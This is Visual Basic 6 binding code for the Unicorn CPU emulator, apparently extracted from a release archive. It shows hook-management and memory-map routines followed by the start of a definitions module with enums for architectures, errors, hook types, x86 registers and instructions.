lng2Cur(beginAt) ' b = lng2Cur(endAt) ' errMsg = Empty ' ' If KeyExistsInCollection(hooks, "instr:" & i) Then ' hookInstruction = True ' Exit Function ' End If ' ' e = ucs_hook_add(uc, hHook, UC_HOOK_INSN, AddressOf instruction_hook, ObjPtr(Me), a, b, hc_inst, i) ' ' If e <> UC_ERR_OK Then ' errMsg = err2str(e) ' Exit Function ' End If ' ' hooks.Add hHook, "instr:" & i ' hookInstruction = True ' ' End Function Function removeHook(ByVal flags As uc_hook_type) As Boolean On Error Resume Next Dim hHook As Long, e As uc_err, wasInstr As Boolean errMsg = Empty hHook = hooks("flags:" & flags) If hHook = 0 Then hHook = hooks("instr:" & flags) 'maybe it was an instruction hook? If hHook = 0 Then errMsg = "Hook handle not found for supplied flags." Exit Function Else wasInstr = True End If End If e = ucs_hook_del(uc, hHook) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If If wasInstr Then hooks.Remove "instr:" & flags Else hooks.Remove "flags:" & flags End If removeHook = True End Function Function getMemMap() As Collection 'of 32bit CMemRegion Dim c As New Collection Dim ret As New Collection Dim mem As CMemRegion Dim e As uc_err Dim s, tmp, v errMsg = Empty Set getMemMap = ret e = get_memMap(uc, c) If e <> uc_err_ok Then errMsg = err2str(e) Exit Function End If For Each s In c '&h1000000,&h11fffff,&h7 these should always be 32bit safe values created in this class.. If Len(s) > 0 Then tmp = Split(s, ",") If UBound(tmp) = 2 Then Set mem = New CMemRegion mem.address = CLng(tmp(0)) mem.endsAt = CLng(tmp(1)) mem.size = ULong(mem.endsAt, mem.address, op_sub) + 1 'vb native math is signed only..we play it safe.. mem.perm = CLng(tmp(2)) ret.Add mem End If End If Next End Function 'these are internal functions used from the callback in the module to route the message to the event interface 'little confusing but in the end easier for the end user...also lays foundation for multiple live instances '(although only one can run at a time since vb is single threaded) Friend Function internal_invalid_mem_hook(ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency) As Long Dim addr As Long, v As Long, continue As Boolean addr = cur2lng(address) v = cur2lng(value) RaiseEvent InvalidMem(t, addr, size, v, continue) internal_invalid_mem_hook = IIf(continue, 1, 0) End Function Friend Sub internal_mem_hook(ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency) Dim addr As Long, v As Long addr = cur2lng(address) v = cur2lng(value) RaiseEvent MemAccess(t, addr, size, v) End Sub Friend Sub internal_code_hook(ByVal address As Currency, ByVal size As Long) Dim addr As Long addr = cur2lng(address) RaiseEvent CodeHook(addr, size) End Sub Friend Sub internal_block_hook(ByVal address As Currency, ByVal size As Long) Dim addr As Long addr = cur2lng(address) RaiseEvent BlockHook(addr, size) End Sub Friend Sub internal_interrupt_hook(ByVal intno As Long) RaiseEvent Interrupt(intno) End Sub �������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/uc_def.bas���������������������������������������������������������������0000664�0000000�0000000�00000253173�14675241067�0017425�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������Attribute VB_Name = "uc_def" Option Explicit 'Unicorn Engine x86 32bit wrapper class for vb6 'Contributed by: FireEye FLARE team 'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> 'License: Apache 2.0 ' supported api: ' ucs_version ' ucs_arch_supported ' ucs_open ' ucs_close ' uc_reg_write ' uc_reg_read ' uc_mem_write ' UC_MEM_READ ' uc_emu_start ' uc_emu_stop ' ucs_hook_add ' uc_mem_map ' uc_hook_del ' uc_mem_regions ' uc_mem_map_ptr ' uc_context_alloc ' uc_free ' uc_context_save ' uc_context_restore ' uc_mem_unmap ' uc_mem_protect ' uc_strerror ' uc_errno ' supported hooks: ' UC_HOOK_CODE ' UC_HOOK_BLOCK ' memory READ/WRITE/FETCH ' invalid memory access ' interrupts ' ' bonus: ' disasm_addr (32bit only uses libdasm) ' mem_write_block (map and write data auto handles alignment) ' get_memMap (wrapper for uc_mem_regions) ' ' 'sample supports multiple instances, required since callbacks must be in a shared module Global instances As New Collection Global UNICORN_PATH As String Global DYNLOAD As Long Public Enum uc_arch UC_ARCH_ARM = 1 ' ARM architecture (including Thumb, Thumb-2) UC_ARCH_ARM64 = 2 ' ARM-64, also called AArch64okok UC_ARCH_MIPS = 3 ' Mips architecture UC_ARCH_X86 = 4 ' X86 architecture (including x86 & x86-64) UC_ARCH_PPC = 5 ' PowerPC architecture (currently unsupported) UC_ARCH_SPARC = 6 ' Sparc architecture UC_ARCH_M68K = 7 ' M68K architecture UC_ARCH_RISCV = 8 ' RISCV architecture UC_ARCH_MAX = 9 End Enum Public Enum uc_prot UC_PROT_NONE = 0 UC_PROT_READ = 1 UC_PROT_WRITE = 2 UC_PROT_EXEC = 4 UC_PROT_ALL = 7 End Enum Public Enum uc_err uc_err_ok = 0 ' No error: everything was fine UC_ERR_NOMEM = 1 ' Out-Of-Memory error: uc_open(), uc_emulate() UC_ERR_ARCH = 2 ' Unsupported architecture: uc_open() UC_ERR_HANDLE = 3 ' Invalid handle UC_ERR_MODE = 4 ' Invalid/unsupported mode: uc_open() UC_ERR_VERSION = 5 ' Unsupported version (bindings) UC_ERR_READ_UNMAPPED = 6 ' Quit emulation due to READ on unmapped memory: uc_emu_start() UC_ERR_WRITE_UNMAPPED = 7 ' Quit emulation due to WRITE on unmapped memory: uc_emu_start() UC_ERR_FETCH_UNMAPPED = 8 ' Quit emulation due to FETCH on unmapped memory: uc_emu_start() UC_ERR_HOOK = 9 ' Invalid hook type: uc_hook_add() UC_ERR_INSN_INVALID = 10 ' Quit emulation due to invalid instruction: uc_emu_start() UC_ERR_MAP = 11 ' Invalid memory mapping: uc_mem_map() UC_ERR_WRITE_PROT = 12 ' Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start() UC_ERR_READ_PROT = 13 ' Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start() UC_ERR_FETCH_PROT = 14 ' Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start() UC_ERR_ARG = 15 ' Inavalid argument provided to uc_xxx function (See specific function API) UC_ERR_READ_UNALIGNED = 16 ' Unaligned read UC_ERR_WRITE_UNALIGNED = 17 ' Unaligned write UC_ERR_FETCH_UNALIGNED = 18 ' Unaligned fetch UC_ERR_HOOK_EXIST = 19 ' hook for this event already existed UC_ERR_RESOURCE = 20 ' Insufficient resource: uc_emu_start() UC_ERR_EXCEPTION = 21 ' Unhandled CPU exception End Enum ' All type of memory accesses for UC_HOOK_MEM_* Public Enum uc_mem_type UC_MEM_READ = 16 ' Memory is read from uc_mem_write = 17 ' Memory is written to UC_MEM_FETCH = 18 ' Memory is fetched UC_MEM_READ_UNMAPPED = 19 ' Unmapped memory is read from UC_MEM_WRITE_UNMAPPED = 20 ' Unmapped memory is written to UC_MEM_FETCH_UNMAPPED = 21 ' Unmapped memory is fetched UC_MEM_WRITE_PROT = 22 ' Write to write protected, but mapped, memory UC_MEM_READ_PROT = 23 ' Read from read protected, but mapped, memory UC_MEM_FETCH_PROT = 24 ' Fetch from non-executable, but mapped, memory UC_MEM_READ_AFTER = 25 ' Memory is read from (successful access) End Enum Public Enum uc_mode 'from /bindings/dotnet/common.fs UC_MODE_LITTLE_ENDIAN = 0 'little-endian mode (default mode) UC_MODE_BIG_ENDIAN = 1073741824 'big-endian mode ' UC_MODE_ARM = 0 'ARM mode ' UC_MODE_THUMB = 16 'THUMB mode (including Thumb-2) ' UC_MODE_MCLASS = 32 'ARM's Cortex-M series (currently unsupported) ' UC_MODE_V8 = 64 'ARMv8 A32 encodings for ARM (currently unsupported) ' UC_MODE_MICRO = 16 'MicroMips mode (currently unsupported) ' UC_MODE_MIPS3 = 32 'Mips III ISA (currently unsupported) ' UC_MODE_MIPS32R6 = 64 'Mips32r6 ISA (currently unsupported) ' UC_MODE_MIPS32 = 4 'Mips32 ISA ' UC_MODE_MIPS64 = 8 'Mips64 ISA UC_MODE_16 = 2 '16-bit mode UC_MODE_32 = 4 '32-bit mode UC_MODE_64 = 8 '64-bit mode ' UC_MODE_PPC32 = 4 '32-bit mode (currently unsupported) ' UC_MODE_PPC64 = 8 '64-bit mode (currently unsupported) ' UC_MODE_QPX = 16 'Quad Processing eXtensions mode (currently unsupported) ' UC_MODE_SPARC32 = 4 '32-bit mode ' UC_MODE_SPARC64 = 8 '64-bit mode ' UC_MODE_V9 = 16 'SparcV9 mode (currently unsupported) ' UC_MODE_RISCV32 = 4 '32-bit mode ' UC_MODE_RISCV64 = 8 '64-bit mode End Enum Public Enum uc_hook_type 'from /bindings/dotnet/common.fs UC_HOOK_INTR = 1 ' Hook all interrupt/syscall events UC_HOOK_INSN = 2 ' Hook a particular instruction UC_HOOK_CODE = 4 ' Hook a range of code UC_HOOK_BLOCK = 8 ' Hook basic blocks UC_HOOK_MEM_READ_UNMAPPED = 16 ' Hook for memory read on unmapped memory UC_HOOK_MEM_WRITE_UNMAPPED = 32 ' Hook for invalid memory write events UC_HOOK_MEM_FETCH_UNMAPPED = 64 ' Hook for invalid memory fetch for execution events UC_HOOK_MEM_READ_PROT = 128 ' Hook for memory read on read-protected memory UC_HOOK_MEM_WRITE_PROT = 256 ' Hook for memory write on write-protected memory UC_HOOK_MEM_FETCH_PROT = 512 ' Hook for memory fetch on non-executable memory UC_HOOK_MEM_READ = 1024 ' Hook memory read events. UC_HOOK_MEM_WRITE = 2048 ' Hook memory write events. UC_HOOK_MEM_FETCH = 4096 ' Hook memory fetch for execution events UC_HOOK_MEM_READ_AFTER = 8192 ' Hook memory read events, but only successful access.(triggered after successful read.) UC_HOOK_MEM_UNMAPPED = 112 UC_HOOK_MEM_PROT = 896 UC_HOOK_MEM_READ_INVALID = 144 UC_HOOK_MEM_WRITE_INVALID = 288 UC_HOOK_MEM_FETCH_INVALID = 576 UC_HOOK_MEM_INVALID = 1008 UC_HOOK_MEM_VALID = 7168 End Enum Public Enum hookCatagory hc_code = 0 hc_block = 1 hc_inst = 2 hc_int = 3 hc_mem = 4 hc_memInvalid = 5 End Enum Public Enum uc_x86_reg UC_X86_REG_INVALID = 0 UC_X86_REG_AH = 1 UC_X86_REG_AL = 2 UC_X86_REG_AX = 3 UC_X86_REG_BH = 4 UC_X86_REG_Bl = 5 UC_X86_REG_BP = 6 UC_X86_REG_BPL = 7 UC_X86_REG_BX = 8 UC_X86_REG_CH = 9 UC_X86_REG_CL = 10 UC_X86_REG_CS = 11 UC_X86_REG_CX = 12 UC_X86_REG_DH = 13 UC_X86_REG_DI = 14 UC_X86_REG_DIL = 15 UC_X86_REG_DL = 16 UC_X86_REG_DS = 17 UC_X86_REG_DX = 18 UC_X86_REG_EAX = 19 UC_X86_REG_EBP = 20 UC_X86_REG_EBX = 21 UC_X86_REG_ECX = 22 UC_X86_REG_EDI = 23 UC_X86_REG_EDX = 24 UC_X86_REG_EFLAGS = 25 UC_X86_REG_EIP = 26 UC_X86_REG_EIZ = 27 UC_X86_REG_ES = 28 UC_X86_REG_ESI = 29 UC_X86_REG_ESP = 30 UC_X86_REG_FPSW = 31 UC_X86_REG_FS = 32 UC_X86_REG_GS = 33 UC_X86_REG_IP = 34 UC_X86_REG_RAX = 35 UC_X86_REG_RBP = 36 UC_X86_REG_RBX = 37 UC_X86_REG_RCX = 38 UC_X86_REG_RDI = 39 UC_X86_REG_RDX = 40 UC_X86_REG_RIP = 41 UC_X86_REG_RIZ = 42 UC_X86_REG_RSI = 43 UC_X86_REG_RSP = 44 UC_X86_REG_SI = 45 UC_X86_REG_SIL = 46 UC_X86_REG_SP = 47 UC_X86_REG_SPL = 48 UC_X86_REG_SS = 49 UC_X86_REG_CR0 = 50 UC_X86_REG_CR1 = 51 UC_X86_REG_CR2 = 52 UC_X86_REG_CR3 = 53 UC_X86_REG_CR4 = 54 UC_X86_REG_CR5 = 55 UC_X86_REG_CR6 = 56 UC_X86_REG_CR7 = 57 UC_X86_REG_CR8 = 58 UC_X86_REG_CR9 = 59 UC_X86_REG_CR10 = 60 UC_X86_REG_CR11 = 61 UC_X86_REG_CR12 = 62 UC_X86_REG_CR13 = 63 UC_X86_REG_CR14 = 64 UC_X86_REG_CR15 = 65 UC_X86_REG_DR0 = 66 UC_X86_REG_DR1 = 67 UC_X86_REG_DR2 = 68 UC_X86_REG_DR3 = 69 UC_X86_REG_DR4 = 70 UC_X86_REG_DR5 = 71 UC_X86_REG_DR6 = 72 UC_X86_REG_DR7 = 73 UC_X86_REG_DR8 = 74 UC_X86_REG_DR9 = 75 UC_X86_REG_DR10 = 76 UC_X86_REG_DR11 = 77 UC_X86_REG_DR12 = 78 UC_X86_REG_DR13 = 79 UC_X86_REG_DR14 = 80 UC_X86_REG_DR15 = 81 UC_X86_REG_FP0 = 82 UC_X86_REG_FP1 = 83 UC_X86_REG_FP2 = 84 UC_X86_REG_FP3 = 85 UC_X86_REG_FP4 = 86 UC_X86_REG_FP5 = 87 UC_X86_REG_FP6 = 88 UC_X86_REG_FP7 = 89 UC_X86_REG_K0 = 90 UC_X86_REG_K1 = 91 UC_X86_REG_K2 = 92 UC_X86_REG_K3 = 93 UC_X86_REG_K4 = 94 UC_X86_REG_K5 = 95 UC_X86_REG_K6 = 96 UC_X86_REG_K7 = 97 UC_X86_REG_MM0 = 98 UC_X86_REG_MM1 = 99 UC_X86_REG_MM2 = 100 UC_X86_REG_MM3 = 101 UC_X86_REG_MM4 = 102 UC_X86_REG_MM5 = 103 UC_X86_REG_MM6 = 104 UC_X86_REG_MM7 = 105 UC_X86_REG_R8 = 106 UC_X86_REG_R9 = 107 UC_X86_REG_R10 = 108 UC_X86_REG_R11 = 109 UC_X86_REG_R12 = 110 UC_X86_REG_R13 = 111 UC_X86_REG_R14 = 112 UC_X86_REG_R15 = 113 UC_X86_REG_ST0 = 114 UC_X86_REG_ST1 = 115 UC_X86_REG_ST2 = 116 UC_X86_REG_ST3 = 117 UC_X86_REG_ST4 = 118 UC_X86_REG_ST5 = 119 UC_X86_REG_ST6 = 120 UC_X86_REG_ST7 = 121 UC_X86_REG_XMM0 = 122 UC_X86_REG_XMM1 = 123 UC_X86_REG_XMM2 = 124 UC_X86_REG_XMM3 = 125 UC_X86_REG_XMM4 = 126 UC_X86_REG_XMM5 = 127 UC_X86_REG_XMM6 = 128 UC_X86_REG_XMM7 = 129 UC_X86_REG_XMM8 = 130 UC_X86_REG_XMM9 = 131 UC_X86_REG_XMM10 = 132 UC_X86_REG_XMM11 = 133 UC_X86_REG_XMM12 = 134 UC_X86_REG_XMM13 = 135 UC_X86_REG_XMM14 = 136 UC_X86_REG_XMM15 = 137 UC_X86_REG_XMM16 = 138 UC_X86_REG_XMM17 = 139 UC_X86_REG_XMM18 = 140 UC_X86_REG_XMM19 = 141 UC_X86_REG_XMM20 = 142 UC_X86_REG_XMM21 = 143 UC_X86_REG_XMM22 = 144 UC_X86_REG_XMM23 = 145 UC_X86_REG_XMM24 = 146 UC_X86_REG_XMM25 = 147 UC_X86_REG_XMM26 = 148 UC_X86_REG_XMM27 = 149 UC_X86_REG_XMM28 = 150 UC_X86_REG_XMM29 = 151 UC_X86_REG_XMM30 = 152 UC_X86_REG_XMM31 = 153 UC_X86_REG_YMM0 = 154 UC_X86_REG_YMM1 = 155 UC_X86_REG_YMM2 = 156 UC_X86_REG_YMM3 = 157 UC_X86_REG_YMM4 = 158 UC_X86_REG_YMM5 = 159 UC_X86_REG_YMM6 = 160 UC_X86_REG_YMM7 = 161 UC_X86_REG_YMM8 = 162 UC_X86_REG_YMM9 = 163 UC_X86_REG_YMM10 = 164 UC_X86_REG_YMM11 = 165 UC_X86_REG_YMM12 = 166 UC_X86_REG_YMM13 = 167 UC_X86_REG_YMM14 = 168 UC_X86_REG_YMM15 = 169 UC_X86_REG_YMM16 = 170 UC_X86_REG_YMM17 = 171 UC_X86_REG_YMM18 = 172 UC_X86_REG_YMM19 = 173 UC_X86_REG_YMM20 = 174 UC_X86_REG_YMM21 = 175 UC_X86_REG_YMM22 = 176 UC_X86_REG_YMM23 = 177 UC_X86_REG_YMM24 = 178 UC_X86_REG_YMM25 = 179 UC_X86_REG_YMM26 = 180 UC_X86_REG_YMM27 = 181 UC_X86_REG_YMM28 = 182 UC_X86_REG_YMM29 = 183 UC_X86_REG_YMM30 = 184 UC_X86_REG_YMM31 = 185 UC_X86_REG_ZMM0 = 186 UC_X86_REG_ZMM1 = 187 UC_X86_REG_ZMM2 = 188 UC_X86_REG_ZMM3 = 189 UC_X86_REG_ZMM4 = 190 UC_X86_REG_ZMM5 = 191 UC_X86_REG_ZMM6 = 192 UC_X86_REG_ZMM7 = 193 UC_X86_REG_ZMM8 = 194 UC_X86_REG_ZMM9 = 195 UC_X86_REG_ZMM10 = 196 UC_X86_REG_ZMM11 = 197 UC_X86_REG_ZMM12 = 198 UC_X86_REG_ZMM13 = 199 UC_X86_REG_ZMM14 = 200 UC_X86_REG_ZMM15 = 201 UC_X86_REG_ZMM16 = 202 UC_X86_REG_ZMM17 = 203 UC_X86_REG_ZMM18 = 204 UC_X86_REG_ZMM19 = 205 UC_X86_REG_ZMM20 = 206 UC_X86_REG_ZMM21 = 207 UC_X86_REG_ZMM22 = 208 UC_X86_REG_ZMM23 = 209 UC_X86_REG_ZMM24 = 210 UC_X86_REG_ZMM25 = 211 UC_X86_REG_ZMM26 = 212 UC_X86_REG_ZMM27 = 213 UC_X86_REG_ZMM28 = 214 UC_X86_REG_ZMM29 = 215 UC_X86_REG_ZMM30 = 216 UC_X86_REG_ZMM31 = 217 UC_X86_REG_R8B = 218 UC_X86_REG_R9B = 219 UC_X86_REG_R10B = 220 UC_X86_REG_R11B = 221 UC_X86_REG_R12B = 222 UC_X86_REG_R13B = 223 UC_X86_REG_R14B = 224 UC_X86_REG_R15B = 225 UC_X86_REG_R8D = 226 UC_X86_REG_R9D = 227 UC_X86_REG_R10D = 228 UC_X86_REG_R11D = 229 UC_X86_REG_R12D = 230 UC_X86_REG_R13D = 231 UC_X86_REG_R14D = 232 UC_X86_REG_R15D = 233 UC_X86_REG_R8W = 234 UC_X86_REG_R9W = 235 UC_X86_REG_R10W = 236 UC_X86_REG_R11W = 237 UC_X86_REG_R12W = 238 UC_X86_REG_R13W = 239 UC_X86_REG_R14W = 240 UC_X86_REG_R15W = 241 UC_X86_REG_IDTR = 242 UC_X86_REG_GDTR = 243 UC_X86_REG_LDTR = 244 UC_X86_REG_TR = 245 UC_X86_REG_FPCW = 246 UC_X86_REG_FPTAG = 247 UC_X86_REG_ENDING = 248 End Enum 'Public Enum uc_x86_insn ' UC_X86_INS_INVALID = 0 ' UC_X86_INS_AAA = 1 ' UC_X86_INS_AAD = 2 ' UC_X86_INS_AAM = 3 ' UC_X86_INS_AAS = 4 ' UC_X86_INS_FABS = 5 ' UC_X86_INS_ADC = 6 ' UC_X86_INS_ADCX = 7 ' UC_X86_INS_ADD = 8 ' UC_X86_INS_ADDPD = 9 ' UC_X86_INS_ADDPS = 10 ' UC_X86_INS_ADDSD = 11 ' UC_X86_INS_ADDSS = 12 ' UC_X86_INS_ADDSUBPD = 13 ' UC_X86_INS_ADDSUBPS = 14 ' UC_X86_INS_FADD = 15 ' UC_X86_INS_FIADD = 16 ' UC_X86_INS_FADDP = 17 ' UC_X86_INS_ADOX = 18 ' UC_X86_INS_AESDECLAST = 19 ' UC_X86_INS_AESDEC = 20 ' UC_X86_INS_AESENCLAST = 21 ' UC_X86_INS_AESENC = 22 ' UC_X86_INS_AESIMC = 23 ' UC_X86_INS_AESKEYGENASSIST = 24 ' UC_X86_INS_AND = 25 ' UC_X86_INS_ANDN = 26 ' UC_X86_INS_ANDNPD = 27 ' UC_X86_INS_ANDNPS = 28 ' UC_X86_INS_ANDPD = 29 ' UC_X86_INS_ANDPS = 30 ' UC_X86_INS_ARPL = 31 ' UC_X86_INS_BEXTR = 32 ' UC_X86_INS_BLCFILL = 33 ' UC_X86_INS_BLCI = 34 ' UC_X86_INS_BLCIC = 35 ' UC_X86_INS_BLCMSK = 36 ' UC_X86_INS_BLCS = 37 ' UC_X86_INS_BLENDPD = 38 ' UC_X86_INS_BLENDPS = 39 ' UC_X86_INS_BLENDVPD = 40 ' UC_X86_INS_BLENDVPS = 41 ' UC_X86_INS_BLSFILL = 42 ' UC_X86_INS_BLSI = 43 ' UC_X86_INS_BLSIC = 44 ' UC_X86_INS_BLSMSK = 45 ' UC_X86_INS_BLSR = 46 ' UC_X86_INS_BOUND = 47 ' UC_X86_INS_BSF = 48 ' UC_X86_INS_BSR = 49 ' UC_X86_INS_BSWAP = 50 ' UC_X86_INS_BT = 51 ' UC_X86_INS_BTC = 52 ' UC_X86_INS_BTR = 53 ' UC_X86_INS_BTS = 54 ' UC_X86_INS_BZHI = 55 ' UC_X86_INS_CALL = 56 ' UC_X86_INS_CBW = 57 ' UC_X86_INS_CDQ = 58 ' UC_X86_INS_CDQE = 59 ' UC_X86_INS_FCHS = 60 ' UC_X86_INS_CLAC = 61 ' UC_X86_INS_CLC = 62 ' UC_X86_INS_CLD = 63 ' UC_X86_INS_CLFLUSH = 64 ' UC_X86_INS_CLFLUSHOPT = 65 ' UC_X86_INS_CLGI = 66 ' UC_X86_INS_CLI = 67 ' UC_X86_INS_CLTS = 68 ' UC_X86_INS_CLWB = 69 ' UC_X86_INS_CMC = 70 ' UC_X86_INS_CMOVA = 71 ' UC_X86_INS_CMOVAE = 72 ' UC_X86_INS_CMOVB = 73 ' UC_X86_INS_CMOVBE = 74 ' UC_X86_INS_FCMOVBE = 75 ' UC_X86_INS_FCMOVB = 76 ' UC_X86_INS_CMOVE = 77 ' UC_X86_INS_FCMOVE = 78 ' UC_X86_INS_CMOVG = 79 ' UC_X86_INS_CMOVGE = 80 ' UC_X86_INS_CMOVL = 81 ' UC_X86_INS_CMOVLE = 82 ' UC_X86_INS_FCMOVNBE = 83 ' UC_X86_INS_FCMOVNB = 84 ' UC_X86_INS_CMOVNE = 85 ' UC_X86_INS_FCMOVNE = 86 ' UC_X86_INS_CMOVNO = 87 ' UC_X86_INS_CMOVNP = 88 ' UC_X86_INS_FCMOVNU = 89 ' UC_X86_INS_CMOVNS = 90 ' UC_X86_INS_CMOVO = 91 ' UC_X86_INS_CMOVP = 92 ' UC_X86_INS_FCMOVU = 93 ' UC_X86_INS_CMOVS = 94 ' UC_X86_INS_CMP = 95 ' UC_X86_INS_CMPPD = 96 ' UC_X86_INS_CMPPS = 97 ' UC_X86_INS_CMPSB = 98 ' UC_X86_INS_CMPSD = 99 ' UC_X86_INS_CMPSQ = 100 ' UC_X86_INS_CMPSS = 101 ' UC_X86_INS_CMPSW = 102 ' UC_X86_INS_CMPXCHG16B = 103 ' UC_X86_INS_CMPXCHG = 104 ' UC_X86_INS_CMPXCHG8B = 105 ' UC_X86_INS_COMISD = 106 ' UC_X86_INS_COMISS = 107 ' UC_X86_INS_FCOMP = 108 ' UC_X86_INS_FCOMPI = 109 ' UC_X86_INS_FCOMI = 110 ' UC_X86_INS_FCOM = 111 ' UC_X86_INS_FCOS = 112 ' UC_X86_INS_CPUID = 113 ' UC_X86_INS_CQO = 114 ' UC_X86_INS_CRC32 = 115 ' UC_X86_INS_CVTDQ2PD = 116 ' UC_X86_INS_CVTDQ2PS = 117 ' UC_X86_INS_CVTPD2DQ = 118 ' UC_X86_INS_CVTPD2PS = 119 ' UC_X86_INS_CVTPS2DQ = 120 ' UC_X86_INS_CVTPS2PD = 121 ' UC_X86_INS_CVTSD2SI = 122 ' UC_X86_INS_CVTSD2SS = 123 ' UC_X86_INS_CVTSI2SD = 124 ' UC_X86_INS_CVTSI2SS = 125 ' UC_X86_INS_CVTSS2SD = 126 ' UC_X86_INS_CVTSS2SI = 127 ' UC_X86_INS_CVTTPD2DQ = 128 ' UC_X86_INS_CVTTPS2DQ = 129 ' UC_X86_INS_CVTTSD2SI = 130 ' UC_X86_INS_CVTTSS2SI = 131 ' UC_X86_INS_CWD = 132 ' UC_X86_INS_CWDE = 133 ' UC_X86_INS_DAA = 134 ' UC_X86_INS_DAS = 135 ' UC_X86_INS_DATA16 = 136 ' UC_X86_INS_DEC = 137 ' UC_X86_INS_DIV = 138 ' UC_X86_INS_DIVPD = 139 ' UC_X86_INS_DIVPS = 140 ' UC_X86_INS_FDIVR = 141 ' UC_X86_INS_FIDIVR = 142 ' UC_X86_INS_FDIVRP = 143 ' UC_X86_INS_DIVSD = 144 ' UC_X86_INS_DIVSS = 145 ' UC_X86_INS_FDIV = 146 ' UC_X86_INS_FIDIV = 147 ' UC_X86_INS_FDIVP = 148 ' UC_X86_INS_DPPD = 149 ' UC_X86_INS_DPPS = 150 ' UC_X86_INS_RET = 151 ' UC_X86_INS_ENCLS = 152 ' UC_X86_INS_ENCLU = 153 ' UC_X86_INS_ENTER = 154 ' UC_X86_INS_EXTRACTPS = 155 ' UC_X86_INS_EXTRQ = 156 ' UC_X86_INS_F2XM1 = 157 ' UC_X86_INS_LCALL = 158 ' UC_X86_INS_LJMP = 159 ' UC_X86_INS_FBLD = 160 ' UC_X86_INS_FBSTP = 161 ' UC_X86_INS_FCOMPP = 162 ' UC_X86_INS_FDECSTP = 163 ' UC_X86_INS_FEMMS = 164 ' UC_X86_INS_FFREE = 165 ' UC_X86_INS_FICOM = 166 ' UC_X86_INS_FICOMP = 167 ' UC_X86_INS_FINCSTP = 168 ' UC_X86_INS_FLDCW = 169 ' UC_X86_INS_FLDENV = 170 ' UC_X86_INS_FLDL2E = 171 ' UC_X86_INS_FLDL2T = 172 ' UC_X86_INS_FLDLG2 = 173 ' UC_X86_INS_FLDLN2 = 174 ' UC_X86_INS_FLDPI = 175 ' UC_X86_INS_FNCLEX = 176 ' UC_X86_INS_FNINIT = 177 ' UC_X86_INS_FNOP = 178 ' UC_X86_INS_FNSTCW = 179 ' UC_X86_INS_FNSTSW = 180 ' UC_X86_INS_FPATAN = 181 ' UC_X86_INS_FPREM = 182 ' UC_X86_INS_FPREM1 = 183 ' UC_X86_INS_FPTAN = 184 ' UC_X86_INS_FFREEP = 185 ' UC_X86_INS_FRNDINT = 186 ' UC_X86_INS_FRSTOR = 187 ' UC_X86_INS_FNSAVE = 188 ' UC_X86_INS_FSCALE = 189 ' UC_X86_INS_FSETPM = 190 ' UC_X86_INS_FSINCOS = 191 ' UC_X86_INS_FNSTENV = 192 ' UC_X86_INS_FXAM = 193 ' UC_X86_INS_FXRSTOR = 194 ' UC_X86_INS_FXRSTOR64 = 195 ' UC_X86_INS_FXSAVE = 196 ' UC_X86_INS_FXSAVE64 = 197 ' UC_X86_INS_FXTRACT = 198 ' UC_X86_INS_FYL2X = 199 ' UC_X86_INS_FYL2XP1 = 200 ' UC_X86_INS_MOVAPD = 201 ' UC_X86_INS_MOVAPS = 202 ' UC_X86_INS_ORPD = 203 ' UC_X86_INS_ORPS = 204 ' UC_X86_INS_VMOVAPD = 205 ' UC_X86_INS_VMOVAPS = 206 ' UC_X86_INS_XORPD = 207 ' UC_X86_INS_XORPS = 208 ' UC_X86_INS_GETSEC = 209 ' UC_X86_INS_HADDPD = 210 ' UC_X86_INS_HADDPS = 211 ' UC_X86_INS_HLT = 212 ' UC_X86_INS_HSUBPD = 213 ' UC_X86_INS_HSUBPS = 214 ' UC_X86_INS_IDIV = 215 ' UC_X86_INS_FILD = 216 ' UC_X86_INS_IMUL = 217 ' UC_X86_INS_IN = 218 ' UC_X86_INS_INC = 219 ' UC_X86_INS_INSB = 220 ' UC_X86_INS_INSERTPS = 221 ' UC_X86_INS_INSERTQ = 222 ' UC_X86_INS_INSD = 223 ' UC_X86_INS_INSW = 224 ' UC_X86_INS_INT = 225 ' UC_X86_INS_INT1 = 226 ' UC_X86_INS_INT3 = 227 ' UC_X86_INS_INTO = 228 ' UC_X86_INS_INVD = 229 ' UC_X86_INS_INVEPT = 230 ' UC_X86_INS_INVLPG = 231 ' UC_X86_INS_INVLPGA = 232 ' UC_X86_INS_INVPCID = 233 ' UC_X86_INS_INVVPID = 234 ' UC_X86_INS_IRET = 235 ' UC_X86_INS_IRETD = 236 ' UC_X86_INS_IRETQ = 237 ' UC_X86_INS_FISTTP = 238 ' UC_X86_INS_FIST = 239 ' UC_X86_INS_FISTP = 240 ' UC_X86_INS_UCOMISD = 241 ' UC_X86_INS_UCOMISS = 242 ' UC_X86_INS_VCOMISD = 243 ' UC_X86_INS_VCOMISS = 244 ' UC_X86_INS_VCVTSD2SS = 245 ' UC_X86_INS_VCVTSI2SD = 246 ' UC_X86_INS_VCVTSI2SS = 247 ' UC_X86_INS_VCVTSS2SD = 248 ' UC_X86_INS_VCVTTSD2SI = 249 ' UC_X86_INS_VCVTTSD2USI = 250 ' UC_X86_INS_VCVTTSS2SI = 251 ' UC_X86_INS_VCVTTSS2USI = 252 ' UC_X86_INS_VCVTUSI2SD = 253 ' UC_X86_INS_VCVTUSI2SS = 254 ' UC_X86_INS_VUCOMISD = 255 ' UC_X86_INS_VUCOMISS = 256 ' UC_X86_INS_JAE = 257 ' UC_X86_INS_JA = 258 ' UC_X86_INS_JBE = 259 ' UC_X86_INS_JB = 260 ' UC_X86_INS_JCXZ = 261 ' UC_X86_INS_JECXZ = 262 ' UC_X86_INS_JE = 263 ' UC_X86_INS_JGE = 264 ' UC_X86_INS_JG = 265 ' UC_X86_INS_JLE = 266 ' UC_X86_INS_JL = 267 ' UC_X86_INS_JMP = 268 ' UC_X86_INS_JNE = 269 ' UC_X86_INS_JNO = 270 ' UC_X86_INS_JNP = 271 ' UC_X86_INS_JNS = 272 ' UC_X86_INS_JO = 273 ' UC_X86_INS_JP = 274 ' UC_X86_INS_JRCXZ = 275 ' UC_X86_INS_JS = 276 ' UC_X86_INS_KANDB = 277 ' UC_X86_INS_KANDD = 278 